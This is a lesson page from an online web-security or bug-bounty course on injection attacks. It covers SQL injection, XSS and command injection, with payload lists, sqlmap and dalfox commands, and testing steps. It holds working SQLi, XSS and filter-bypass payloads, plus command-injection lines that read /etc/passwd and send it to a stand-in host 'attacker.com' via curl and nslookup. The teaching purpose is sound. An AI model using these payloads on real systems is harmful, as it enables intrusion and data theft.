Nerd Level Tech logo
|
Lesson 10 of 24

Web Vulnerability Classes

Injection Attacks

4 min read

Injection is #5 on OWASP Top 10:2025 but remains highly impactful. SQL injection, XSS, and command injection can lead to data breaches, account takeover, and RCE.

SQL Injection

User input executed as SQL queries:

Detection

# Basic test payloads
' OR '1'='1
" OR "1"="1
' OR '1'='1' --
'; SELECT * FROM users --
1' AND '1'='1
1' AND '1'='2  # Compare responses

Error-Based SQLi

Force errors to leak data:

# MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) --

# Simpler version
' AND extractvalue(1,concat(0x7e,(SELECT version())))--

Blind SQLi

No visible errors—infer from behavior:

# Boolean-based
' AND 1=1 --  # True condition
' AND 1=2 --  # False condition
# Compare response differences

# Time-based
' AND SLEEP(5) --           # MySQL
' AND pg_sleep(5) --        # PostgreSQL
'; WAITFOR DELAY '0:0:5' -- # MSSQL

Automated Testing

# Using sqlmap
sqlmap -u "https://example.com/search?q=test" --dbs --batch

# With captured request
sqlmap -r request.txt --dbs --batch

# POST parameter
sqlmap -u "https://example.com/login" --data="user=test&pass=test" -p user

Cross-Site Scripting (XSS)

Inject JavaScript into web pages:

Types

Type Persistence Example
Reflected Single request Search results page
Stored Database Comments, profiles
DOM-based Client-side URL fragment manipulation

Testing Payloads

<!-- Basic -->
<script>alert('XSS')</script>

<!-- Event handlers -->
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

<!-- Filter bypass -->
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert('XSS')">

<!-- DOM XSS -->
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

Context-Specific Payloads

<!-- Inside HTML attribute -->
" onfocus=alert('XSS') autofocus="

<!-- Inside JavaScript -->
';alert('XSS');//
</script><script>alert('XSS')</script>

<!-- Inside URL parameter -->
javascript:alert('XSS')

Automation

# Using dalfox
dalfox url "https://example.com/search?q=FUZZ" --blind https://your-callback.com

# Multiple URLs
cat urls.txt | dalfox pipe --blind https://callback.com

Command Injection

OS commands executed through application:

Detection

# Linux payloads
; ls -la
| cat /etc/passwd
`whoami`
$(id)
; sleep 10  # Time-based

# Windows payloads
& dir
| type C:\Windows\win.ini
; ping -n 10 127.0.0.1  # Time-based

Common Vulnerable Functions

Language Dangerous Functions
PHP system(), exec(), shell_exec(), passthru()
Python os.system(), subprocess.call(), eval()
Node.js child_process.exec(), eval()
Java Runtime.exec()

Testing Methodology

# Step 1: Find input that might reach OS commands
# - File operations (filename parameter)
# - Network operations (hostname, IP)
# - System info displays

# Step 2: Test with time-based payloads
# Inject: ; sleep 10
# If response takes 10 seconds = vulnerable

# Step 3: Extract data
# Inject: ; curl https://attacker.com/$(whoami)
# Check your server logs

Out-of-Band Testing

When no direct response—exfiltrate via DNS/HTTP:

# DNS exfiltration
; nslookup $(whoami).attacker.com

# HTTP callback
; curl https://attacker.com/?data=$(cat /etc/passwd | base64)

# Using Burp Collaborator
; nslookup <burp-collaborator-id>.burpcollaborator.net

Real-World Bounty Examples

Type Company Impact Bounty
SQLi Yahoo Database access $10,000
Stored XSS Twitter Account takeover $7,500
Command Injection Netflix RCE on server $15,000
Blind SQLi Uber User data extraction $5,000

Testing Tips

  1. Test every input: Form fields, headers, cookies, URL params
  2. Check different contexts: HTML, JS, SQL, commands
  3. Use encoding: URL-encode, HTML-encode payloads
  4. Chain vulnerabilities: XSS + CSRF = Account takeover

Pro Tip: Modern WAFs block basic payloads. Learn encoding tricks and context-specific bypasses.

Next, we'll explore authentication and session vulnerabilities. :::

Quiz

Module 3: Web Vulnerability Classes

Take Quiz